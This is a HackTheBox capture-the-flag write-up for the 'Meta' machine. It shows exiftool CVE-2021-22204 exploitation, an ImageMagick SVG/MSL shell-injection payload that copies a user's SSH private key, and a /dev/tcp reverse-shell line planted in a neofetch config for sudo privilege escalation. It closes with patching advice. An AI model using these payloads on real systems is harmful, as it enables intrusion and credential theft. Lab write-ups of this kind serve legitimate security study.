GitHub icon LinkedIn icon d="M6.667 4h18.667c1.467 0 2.667 1.2 2.667 2.667v18.667c0 1.467-1.2 2.667-2.667 2.667H6.667A2.675 2.675 0 0 1 4 25.334V6.667C4 5.2 5.2 4 6.667 4zm16.946 8.44c.64-.533 1.387-1.173 1.72-1.88-.547.28-1.2.453-1.92.547.667-.48 1.>
Writeup - Meta (HTB)
5 min read

Writeup - Meta (HTB)

Writeup - Meta (HTB)

This is a writeup for the Meta machine from the HackTheBox site.


First, let's start with a scan of our target with the following command:

nmap -sV -T4 -Pn

Two TCP ports are discovered:

  • 22/tcp : SSH port (OpenSSH 7.9p1)
  • 80/tcp : HTTP web server (Apache httpd)


At first I order by listing the different pages of the site.

Nothing in particular, I continue by making an enumeration of the subdomains.

Ok, there is a subdomain, I add it to the /etc/hosts file, then I access it via a browser.


It is a page that redirects us to another page that contains a form to upload a file.


So I try to upload an image to see what the page tells me:

The result reminds me strongly of a crypto tool I already used: exiftool.

So I know that on the server side, this tool is used, it's a good information ! So I look if there are exploits with this service. Quickly I find this flaw : CVE-2021-22204. It is an exploit that allows via meta data in an image the execution of instructions. So we can create a reverse shell ! With a little more research I find this github.

It is a tool for image modification and reverse shell insertion.

└─$ python3
    1 image files updated

Once the image is modified, I upload it and it creates the reverse shell:

I look for the location of the flag with the following command:

find / -name user.txt 2>/dev/null

I find that the flag is in thomas personal file, but I don't have the rights to read it...

So I am looking for a way to change the user. In the site folder, I find a folder convert_image... It is said to be an input folder for a script or a service that would convert images. I am looking for other elements with the same name on the system:

[email protected]:/var/www/dev01.artcorp.htb/convert_images$ find / -name convert_image* 2>/dev/null
<ert_images$ find / -name convert_image* 2>/dev/null     

There is a script with the same name! Looking at the content, I can see that it uses the mogrify service to perform the conversion of the images in the folder.

cd /var/www/dev01.artcorp.htb/convert_images/ && /usr/local/bin/mogrify -format png *.* 2>/dev/null
pkill mogrify

I look for the version of the service with the following command:

Then I look if there are some feats. After some research I find this exploit. It allows to do a shell injection in an SVG image.

So I use the template provided in the article, then I modify it to get the content of the id_rsa file of the user thomas.

<image authenticate='ff" `echo $(cat /home/thomas/.ssh/id_rsa)> /dev/shm/id`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="" xmlns:xlink="">       
  <image xlink:href="msl:poc.svg" height="100" width="100"/>

Then I copy the file to the convert_images folder. After a few seconds I find the newly created file in the /dev/shm.

Now that I have this file, I add the privileges and create an SSH session:

I now have a shell as thomas and I get the first flag.

Privilege escalation

I start by checking the sudo permissions of my user. I notice 2 things:

  • I have the right to use the command /usr/bin/neofetch \"\" as root
  • The environment variable XDG_CONFIG_HOME is kept when running sudo

After some research, I find that neofetch has a file in configuration in the folder ~/.config/neofetch/. So I start by putting a reverse shell in this config file.

[email protected]:~/.config/neofetch$ cd .config/neofetch/
[email protected]:~/.config/neofetch$ echo "/bin/sh -i >& /dev/tcp/ 0>&1" > config.conf

Then I set the variable XDG_CONFIG_HOME with the .local of my user. Then I run neofetch as sudo.

[email protected]:~/.config/neofetch$ export XDG_CONFIG_HOME="$HOME/.config"
tho[email protected]:~/.config/neofetch$ sudo -u root /usr/bin/neofetch \"\"

I now have a reverse shell root and I can get the last flag.


To patch this host I think it would be necessary to perform a number of actions:

  • Update exiftool to avoid CVE-2021-22204
  • Update mogrify to avoid shell injection exploit
  • Disable the option to keep theXDG_CONFIG_HOME variable at runtime with sudo

Owned Meta from Hack The Box!
I have just owned machine Meta from Hack The Box